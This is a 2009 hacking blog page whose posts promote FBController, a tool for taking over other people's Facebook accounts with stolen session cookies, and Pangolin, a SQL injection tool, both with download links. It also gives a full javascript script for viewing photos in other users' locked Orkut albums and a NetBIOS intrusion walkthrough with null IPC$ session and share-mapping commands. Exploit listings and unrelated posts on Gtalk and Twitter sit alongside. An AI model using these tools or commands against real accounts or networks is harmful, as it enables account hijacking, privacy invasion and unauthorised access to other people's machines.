All about Hacking,tools,Network Security Tools,Ethical Hacking, Penetration Testing & Computer Security
Friday, June 5, 2009
FBController - The Ultimate Utility to Control Facebook Accounts
You need to feed it biscuits (cookies) before you can do anything.
You can get the target’s cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, Scroogle search or however you like.
Once you have the cookies you can use FBController to have Full control over the target’s Facebook account.
Login to your Facebook account and sniff your own cookie OR collect a few live Facebook Biscuit/s of your Target/s.
Till now FBController version 1.0 uses your Target’s provided cookie and only :
A > Downloads the HomePage.
B > Allows you to Update the Target’s Wall and
C > Retrieve your Target’s Friend’s List
There are many APIs available to write apps and 3rd party Tools for FB in Java, Perl, .NET, etc.
FBConTroller was entirely written without knowing any of Facebook’s Dev API’s. Considering the above along with Facebook’s complexity, the next version might take some time to get released
You can download FBController here:
FBConTroller.RAR
Fiddler - Web Debugging Proxy For HTTP(S)Fiddler - Web Debugging Proxy For HTTP(S)
If you want some info on how to use Fiddler for debugging you can check here: Fiddler Can Make Debugging Easy
You can download Fiddler here:
Download Fiddler from server
Pangolin - Automatic SQL Injection Tool
Database Support
•Access: Informations (Database Path; Root Path; Drivers); Data
•MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
•MySql: Informations; Data; FileReader; FileWriter;
•Oracle: Inforatmions (Version; IP; Database; Accounts ……); Data; and any others;
•Informix: Informatons; Data
•DB2: Informatons; Data; and more;
•Sybase: Informatons; Data; and more;
•PostgreSQL: Informatons; Data; FileReader;
•Sqlite: Informatons; Data
At present, most of the functions are directed at MSSQL and MySql coupled with Oracle and Access. Other small and medium-sized companies are using DB2, Informix, Sybase, PostgreSQL, as well as Sqlite which isn’t so common.
Thursday, June 4, 2009
Hack Tools, Utilities and Exploits
Astalavista Tools and Utilities
Packetstorm Last 10 Files
- joomla1510-xss.txt - Joomla! version 1.5.10 suffers from multiple persistent cross site scripting vulnerabilities in the JA_Purity template.
- kjtechforce-blindsql.txt - Kjtechforce Mailman Beta-1 suffers from a remote blind SQL injection vulnerability.
- kjtechforce-sqldelete.txt - Kjtechforce Mailman Beta-1 suffers from a remote SQL injection delete row vulnerability.
- pixelactivo-sqlbypass.txt - Pixelactivo version 3.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
- pixelactivo-sql.txt - Pixelactivo version 3.0 suffers from a remote SQL injection vulnerability.
- peazip-inject.txt - PeaZIP versions 2.6.1 and below compressed filename command injection proof of concept exploit.
- MDVSA-2009-129.txt - Mandriva Linux Security Advisory 2009-129 - Heap-based buffer overflow in the cdf_read_sat function in src/cdf.c in Christos Zoulas file 5.00 allows user-assisted remote attackers to execute arbitrary code via a crafted compound document file, as demonstrated by a.msi,.doc, or.mpp file. NOTE: some of these details are obtained from third party information. This update provides file-5.03, which is not vulnerable to this, and other unspecified issues.
- dsa-1812-1.txt - Debian Security Advisory 1812-1 - Apr-util, the Apache Portable Runtime Utility library, is used by Apache 2.x, Subversion, and other applications. Two denial of service vulnerabilities have been found in apr-util.
- astalavista-pwned.txt - The Astalavista.com web site has been completely compromised and all user details have been exposed.
- MDVSA-2009-128.txt - Mandriva Linux Security Advisory 2009-128 - Multiple security vulnerabilities have been identified and fixed in libmodplug. These range from integer to buffer overflows. The updated packages have been patched to prevent this.
Packetstorm Tools
- iodine-0.5.2.tar.gz - iodine is a piece of software that lets you tunnel IPv4 data through a DNS server. This can be useful in situations where Internet access is firewalled, but DNS queries are allowed. It needs a TUN/TAP device to operate. The bandwidth is asymmetrical with limited upstream and up to 1 Mbit/s downstream.
- wpadcheck_en.zip - Simple Freeware Network Checker to detect potentially dangerous entries in Microsoft DNS and WINS name servers (MS09-008).
- kismet-2009-05-RC2.tar.gz - Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible interesting (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
- advchk-3.00.tar.bz2 - Advchk (Advisory Check) reads security advisories so you do not have to. Advchk gathers security advisories using RSS feeds, compares them to a list of known services, and alerts you if you are vulnerable. Since adding hosts and services by hand would be quite a boring task, advchk leverages nmap for automatic service and version discovery.
- pkd-1.4.tgz - ipt_pkd is an iptables extension implementing port knock detection. This project provides 3 parts: the kernel module ipt_pkd, the iptables user space module libipt_pkd.so, and a user space client knock program. For the knock packet, it uses a UDP packet sent to a random port that contains a SHA-256 of a timestamp, small header, random bytes, and a shared key. ipt_pkd checks the time window of the packet and does the SHA-256 to verify the packet. The shared key is never sent. This version adds support for libxtables, iptables 1.4.3.2, and Linux kernel 2.6.29. A port config option was added on the Python knock, so you don't have to have a bunch of UDP ports open on a firewall to pass a knock through to an internal client.
- pdfresurrect-v0_6.tar.gz - PDFResurrect is a tool aimed at analyzing PDF documents. The PDF format allows for previous document changes to be retained in a more recent version of the document, thereby creating a running history of changes for the document. This tool attempts to extract all previous versions while also producing a summary of changes between versions. It can also scrub or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read.
- ProxyHarvest.txt - Proxy Harvesting tool that uses google and evaluates the sites.
- mandos_1.0.10.orig.tar.gz - The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
- darkTouch.txt - darkTouch is a fuzzer that attempts to fingerprint the structure of a website.Written in Python.
- rsbac-common-2.6-1.4.2.tar.bz2 - Rule Set Based Access Control (RSBAC) is an open source security extension for current Linux kernels. It is based on the Generalized Framework for Access Control (GFAC) and provides a flexible system of access control implemented with the help of a kernel patch. All security relevant system calls are extended by security enforcement code. This code calls the central decision component, which in turn calls all active decision modules and generates a combined decision. This decision is then enforced by the system call extensions. This version is for the 2.6 kernel. This release is for Linux kernel 2.6.29.2. A significant speedup and even better SMP scalability are expected from the new RCU based list locking. The most important changes since 1.3.5 are the addition of VUM (Virtual User Management) support, OTP support for UM, support of ANY for NETLINK control, checking of CLOSE requests in RC, the addition of SCD target videomem and kernel attribute pagenr, ext4 secure delete support, and many small bugfixes too. Generic lists were changed to use RCU instead of rw spinlocks.
Packetstorm Exploits
- joomla1510-xss.txt - Joomla! version 1.5.10 suffers from multiple persistent cross site scripting vulnerabilities in the JA_Purity template.
- kjtechforce-blindsql.txt - Kjtechforce Mailman Beta-1 suffers from a remote blind SQL injection vulnerability.
- kjtechforce-sqldelete.txt - Kjtechforce Mailman Beta-1 suffers from a remote SQL injection delete row vulnerability.
- pixelactivo-sqlbypass.txt - Pixelactivo version 3.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
- pixelactivo-sql.txt - Pixelactivo version 3.0 suffers from a remote SQL injection vulnerability.
- peazip-inject.txt - PeaZIP versions 2.6.1 and below compressed filename command injection proof of concept exploit.
- hostdirpro-passwd.txt - Host Directory PRO version 2.1.0 remote administrative password changing exploit.
- webdirpro-backup.txt - Web Directory PRO suffers from a remote database backup vulnerability.
- hostdirpro-backup.txt - Host Directory PRO version 2.1.0 suffers from a remote database backup vulnerability.
- webdirpro-passwd.txt - Web Directory PRO remote administrative password changing exploit.
Securiteam Exploits
- Nortel Contact Center Manager Server Password Disclosure Vulnerability -
The Nortel Contact Center Manager Server web application provides a SOAP interface. This interface does not need authorisation and responds to certain requests with sensitive information . - ATEN IP KVM Switch Multiple Vulnerabilities - ATEN produces several IP KVM Switches. These devices can be used like normal kvm switches with an attached keyboard, mouse and monitor. However, it is also possible to access the hosts connected to them via a network using an ordinary PC as a client. As this function can be used via an insecure network, it is very important that this connection is cryptographically protected against sniffing of confidential data (e.g. keystrokes, monitor signals) and man in the middle attacks. The affected products provide an SSL encrypted web interface. After authenticating to the web interface the user can download a client program (java or windows). The ATEN client program contains temporary authentication data so that it can connect to the kvm switch without asking the user for username/password again.
- HP Printers and HP Digital Senders Unauthorized Access to Files -
A potential security vulnerability has been identified with certain HP LaserJet printers, HP Color LaserJet printers and HP Digital Senders. The vulnerability could be exploited remotely to gain unauthorized access to files . - Android Improper Package Verification -
Android, an open source mobile phone platform, improperly checks developer certificates when installing packages that request the shared user identifier (uid) permission . - Sun Communications Express Multiple XSS -
Several cross-site scripting vulnerabilities were found in two files/urls of the Sun Java System Communications Express .
Web Based E-mail (Hotmail Yahoo Gmail) Hack/Hacking with JavaScript
pleez, pleez, PLEEZ teach me how to hack a Hotmail Account!!!”
-unidentified IRC user
From here on in you walk alone. Neither little_v OR Black Sun Research Facility AND its members will be responsible for what you do with the information presented here. Do not use this information to impress your “l33t0_b0rit0″ friends. Do not operate in shower. Objects in article may be closer than they appear.
Note: If you see (x), where x is a number, it means that this term is defined at (x) at the bottom of this article.
Intro
The purpose of this article is NOT, I repeat, NOT to teach someone how to “hack an email account”. It’s true purpose is actually MUCH more devious. The purpose of this and all other articles in the “An Exploit Explained: ” series is to teach readers about various web technologies, and the basics of security and exploiting. I will try to give you a hands-on, learn as you go type of education in computer security. Sound good??? Then let’s get in to it!!
Preface
On Wednesday, Sept. 22 1999, yet another bleary day in the life of little v, the following message was sent to my inbox:
To: BugTraq
Subject: Yet another major Hotmail security hole -
injecting JavaScript using "javasCript:"
Date: Wed Sep 22 1999 10:48:04
Author: Georgi Guninski
Message-ID: <37e8d004.ef848f34@nat.bg>
Yet another major Hotmail security hole - injecting
JavaScript using "javasCript:"
There is a major security flaw in Hotmail which allows
injecting and executing JavaScript code in an email
message using the javascript protocol. This exploit
works both on Internet Explorer 5.0 (guess IE 4.x)
and Netscape Communicator 4.x. Hotmail filters the
"javascript:" protocol for security reasons. But it
does not filter properly the following case:
"javasCript:" where "C" is the ASCII code of "C".
So the following HTML is executed
if the user has enabled automatically loading of
images (most users have).
Probably this may be used in other HTML tags.
Executing JavaScript when the user opens Hotmail
email message allows for example displaying a fake
login screen where the user enters his password
which is then stolen. I don't want to make a scary
demonstration, but I am sure it is also possible to
read user's messages, to send messages from user's
name and doing other mischief. Hotmail deliberately
escapes all JavaScript (it can escape) to prevent such
attacks, but obviously there are holes. It is much
easier to exploit this vulnerability if the user uses
Internet Explorer 5.0. AFAIK this is not a browser
problem, it is Hotmail's problem.
Workaround: Disable JavaScript
The code is:
....
....
Regards,
Georgi Guninski
http://www.securityfocus.com/external/http://www.nat.bg/~joro
Ok, don’t puke, I’m going to explain what just happened in a fashion that even your dog can understand.
What is this all about?
This important part of this posting to the Bugtraq(1) (http://www.securityfocus.com) mailing list is the actual exploit(2).
The exploit would be:
What does it do?
As this exploit, when put into an email message sent to a hotmail user, opens a little box using the “alert()”(3) function in javascript(4), and is also supposed to read who the first message in your inbox is from. However, this code does not work on its own. You see, the email also says that you need to use the ASCII(5) code for “C” in the message. If I get out my handy HTML reference book, I can see that the ASCII code is C. If we substitute this into our little exploit, minus the “read who the first message in your inbox” part, we get this:
How does it work?
Finding out how an exploit works is always the part that makes people a bit spindizzy. If we look at that gibberish we call code one more time we can see that it uses an tag, which all you who took my HTML tutorial would know is to display an image onto the page. Because hotmail tries to be the “top dog” webmail provider, they allow you to set autoloading of images, so the image just shows up on the same page as the mail. When you open a new hotmail account, this option is already set (hurray!). The conflict happens because your normal browser allows you to put javascript tags into your IMG tags. Because JavaScript is a strong little language, and allows just about full control over someone’s browser, if the conditions are right. Naturally, people like you and me started exploiting hotmail’s allowing of javascript. Soon, the
Wednesday, May 27, 2009
Login to Multiple Accounts Using Gtalk
And want to login with both of them on Gtalk on single PC?
This is what I wanted to do as I’ve got two Google IDs, so I found out the way to run multiple GTalks simultaneously…
How to do it:
- Create a shortcut to GTalk on your desktop (if you dont have currently).
- Go to the properties of the shortcut. There in the target, you’ll see something like: “C:\Program Files\Google\Google Talk\googletalk.exe”
- Add /nomutex to that target line. Then the line would be (Include the Quotes in the address) :
“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex
- “Apply” it and then click “Ok”.
- Check out if it works, Enjoy Multi-GTalks!
Don’t forget to leave comments here if this works…[:)]
How this Works:
The mutex is short for mutual exclusion object. A mutex is a program object that allows multiple program threads to share the same resource, but not simultaneously.
So, in the hack above, we used nomutex (no-mutex) so to use the same resources simultaneously…
Thursday, May 21, 2009
Why Would Twitter Kill RSS?
There is no question that Twitter and RSS have some things in common. However, they are not the same, and Twitter will not kill the feed reader. This is a concept I have seen come up a number of times, and frankly, I just don't see it happening, at least not without some dramatic changes in how Twitter is presented to its users.
Note: There are many different feed readers that offer different options. I am not familiar with all of them. There are also many Twitter applications out there that allow for different kinds of integrations, and again I am not familiar with all of them.
There are similarities and differences between the concepts that are RSS and Twitter. Let's look at a few of them.
How They Are the Same
- One thing they have in common is that there are a lot of people that don't understand the purpose of either one.
- Both can bring you a wealth of information that you are interested in receiving into one convenient place.
- Both can keep you up to date with news.
- Both can provide a means of discovering new and interesting content.
- From the content provider's perspective, both can provide a convenient delivery method.
How they Are Different
- Of course, Twitter is a two-way communication tool whereas a feed reader only brings information in. Although some have social features that allow for interaction...Google for example has gotten more social with sharing and commenting features.
- With RSS there is a better chance that content won't go overlooked. Feed readers put a number on the unread posts. Twitter is a never-ending stream. Granted, you can go to each person's stream separately, but you won't see any specific number of unread posts.
- RSS Readers can be organized, broken down into categories...how do you organize Twitter messages (without RSS feeds)?
- With Twitter, you can only subscribe to or "follow" those you find on Twitter. With RSS, you pretty much have the entire web as long as the site offers feeds, which most providing regular content do by now. Most blogging platforms create feeds automatically.
- With feeds, you get a lot more visible content. With Twitter, you get 140 characters. Some feeds allow for full text. With tweets you will always have to follow links to get full content.
- Tweets are real-time. RSS tends to drag behind a bit (at least in my experience).
Jeff Chandler puts it well (if not bluntly):
"To limit yourself to Twitter instead of RSS is a dumb move because your feedreader provides you the opportunity to see the bigger picture. You get to see many viewpoints instead of just one. You get to see trends outside of what people are talking about. Instead of updates or cool posts from here or their on the web, your feedreader serves the purpose of bringing all sorts of great information from across the web to you in one location."
You can subscribe to Twitter streams as RSS feeds, for better organization, which is another endorsement for RSS. Use a feed reader to organize your Twitter friends' posts. You can also set up your blog to post to Twitter via RSS.
Will Twitter replace feed readers? I don't think so. But it certainly could become more mainstream (if it hasn't already). You could probably find more people on the street that have heard of Twitter than have RSS at this point. But for those who have already been enjoying RSS, you're going to have a hard time convincing them that Twitter will replace it in their lives.
While similar in some aspects, they are clearly two very different animals. Like blogs and Twitter, there is no reason why they can't co-exist, and even feed off of each other.
The best links on Twitter often come from people who acquire those links themselves via feed readers. Likewise, a lot of bloggers are gathering information from Twitter to compose their content.
I do think that RSS and Twitter can be used to explain each other to those who don't grasp the concept of one or the other. If you describe Twitter as "sort of a feed reader" type service, you may drive (at least part of) the point home. If someone doesn't understand RSS, you might be able to explain it using Twitter as an example. Just a thought.
Orkut Album Hack : View Photos From Locked Orkut Album!
Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE.
Next time you see a profile with locked album do not get annoyed! Just use following codes and all photos from album will appear on screen!
javascript:alert("Wait for few seconds for pic`s to load......");nb= document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML=”
SCRIPT BY Ethical Hacking Community”;for(i=1;i<=100;i++){document.body.innerHTML+=’
’;};void(0)
Steps to use above code:
- Go to the profile with locked album.
- Paste above code in address bar/navigation bar.
- HIT Enter key and all photos from locked album will appear on screen!
IMPORTANT: (Added on Jan 3, 2008)
Code in above box are lengthy. So crosscheck following…
- when you paste code and hit enter you should get a box with OK button and message “Wait for few seconds for pics to load……”
- If scripts executes successfully you will see a page with very big title “ALBUM HACKSCRIPT BY Ethical Hacking Community”
Successful execution of script may not always give you results as per expectations! So…
Few Notes: (Added on Jan 3, 2008)
- Script may not work on few profile. The problem faced by Amit was this only. He encountered one such exception profile. Try on other profiles before reporting problem here.
- Script may not show all pics. Worst you will get to see only one pic.
- Script can not fetch full pics but large thumbnails only you can see.
I got this hack by email from surun and also read about similar hack on jerry’s blog few days back. I wanted to post about it but orkut rectified it quickly!
Related: View Scraps from Locked Scrapbook
Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE.
Saturday, May 16, 2009
Pangolin - Automatic SQL Injection Tool
Database Support
- Access: Informations (Database Path; Root Path; Drivers); Data
- MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
- MySql: Informations; Data; FileReader; FileWriter;
- Oracle: Inforatmions (Version; IP; Database; Accounts ……); Data; and any others;
- Informix: Informatons; Data
- DB2: Informatons; Data; and more;
- Sybase: Informatons; Data; and more;
- PostgreSQL: Informatons; Data; FileReader;
- Sqlite: Informatons; Data
At present, most of the functions are directed at MSSQL and MySql coupled with Oracle and Access. Other small and medium-sized companies are using DB2, Informix, Sybase, PostgreSQL, as well as Sqlite which isn’t so common.
You can download Pangolin here:
pangolin_free_edition_2.1.2.924.rar
Top 15 Security/Hacking Tools & Utilities
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.
2. Nessus Remote Security ScannerRecently went closed source, but is still essentially free. Works with a client-server framework.
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.
6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.
9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
10. PuTTYPuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.
12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).
14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
- Verify that your network is set up the way you intended.
- Find locations with poor coverage in your WLAN.
- Detect other networks that may be causing interference on your network.
- Detect unauthorized “rogue” access points in your workplace.
- Help aim directional antennas for long-haul WLAN links.
- Use it recreationally for WarDriving.
15. hping
To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Wednesday, May 13, 2009
Remote Network Penetration via NetBios Hack/Hacking
These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.
This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.
When targetting a given network, the first thing an intruder would do, would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan but what the intruder is looking for is an open port 139 – the Default NetBios port. It’s surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.
Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.
Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.
Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.
If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.
The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.
Interpretation the information can reveal more than one might think.
Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
Switches
-a Lists the remote computer's name table given its host name.
-A Lists the remote computer's name table given its IP address.
-c Lists the remote name cache including the IP addresses.
-n Lists local NetBIOS names.
-r Lists names resolved by broadcast and via WINS.
-R Purges and reloads the remote cache name table.
-S Lists sessions table with the destination IP addresses.
-s Lists sessions table conversions.
The column headings generated by NBTSTAT have the following meanings:
Input
Number of bytes received.
Output
Number of bytes sent.
In/Out
Whether the connection is from the computer (outbound)
or from another system to the local computer (inbound).
Life
The remaining time that a name table cache entry will "live"
before your computer purges it.
Local Name
The local NetBIOS name given to the connection.
Remote Host
The name or IP address of the remote host.
Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often
means something because the same name can be present
multiple times on the same computer. This shows the last
byte of the name converted into hex.
State
Your NetBIOS connections will be shown in one of the
following "states":
State Meaning
Accepting An incoming connection is in process.
Associated The endpoint for a connection has been created
and your computer has associated it with an IP
address.
Connected This is a good state! It means you're connected
to the remote resource.
Connecting Your session is trying to resolve the name-to-IP
address mapping of the destination resource.
Disconnected Your computer requested a disconnect, and it is
waiting for the remote computer to do so.
Disconnecting Your connection is ending.
Idle The remote computer has been opened in the current
session, but is currently not accepting connections.
Inbound An inbound session is trying to connect.
Listening The remote computer is available.
Outbound Your session is creating the TCP connection.
Reconnecting If your connection failed on the first attempt,
it will display this state as it tries to reconnect.
Here is a sample NBTSTAT response of my NT Box:
C:\>nbtstat -A 195.171.236.139
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MR_B10NDE <00> UNIQUE Registered
WINSEKURE LABS <00> GROUP Registered
MR_B10NDE <03> UNIQUE Registered
MR_B10NDE <20> UNIQUE Registered
WINSEKURE LABS <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
Using the table below, what can you learn about the machine?
Name Number Type Usage
=========================================================================00 U Workstation Service 01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser03 U Messenger Service 06 U RAS Server Service 1F U NetDDE Service 20 U File Server Service 21 U RAS Client Service 22 U Exchange Interchange 23 U Exchange Store 24 U Exchange Directory 30 U Modem Sharing Server Service 31 U Modem Sharing Client Service 43 U SMS Client Remote Control 44 U SMS Admin Remote Control Tool 45 U SMS Client Remote Chat 46 U SMS Client Remote Transfer 4C U DEC Pathworks TCPIP Service 52 U DEC Pathworks TCPIP Service 87 U Exchange MTA 6A U Exchange IMC BE U Network Monitor Agent BF U Network Monitor Apps 03 U Messenger Service 00 G Domain Name 1B U Domain Master Browser 1C G Domain Controllers 1D U Master Browser 1E G Browser Service Elections 1C G Internet Information Server 00 U Internet Information Server [2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0.
An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it’s share of vulnerabilities, so this type of information is certainly useful to an intruder.
The next step for an intruder would be to try and list the open shares on the given computer, using the net view command, Here is an example of the net view command used against my box with the open shares C:\ and C:\MP3S\
C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139
Sharename Type Comment
-----------------------------------------------------------------
C Disk Drive C:\
MP3S Disk My collection of MP3s
The command was completed successfully.
This information would give the intruder a list of shares which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive which he could then browse:
C:\>net use G: \\195.171.236.139\C
The command was completed successfully.
C:\>G:
G:\>
However, If the intruder was targetting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.
A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.
Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools
The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.
To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:
c:\>net use \\[ip address of target machine]\ipc$ "" /user:""
If the connection is successful, the intruder could do a number of things other than gleaning a user list, but lets start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.
At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.
Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user – all through a null IPC session. This information gathering ability will appear in Rhino9’s soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.
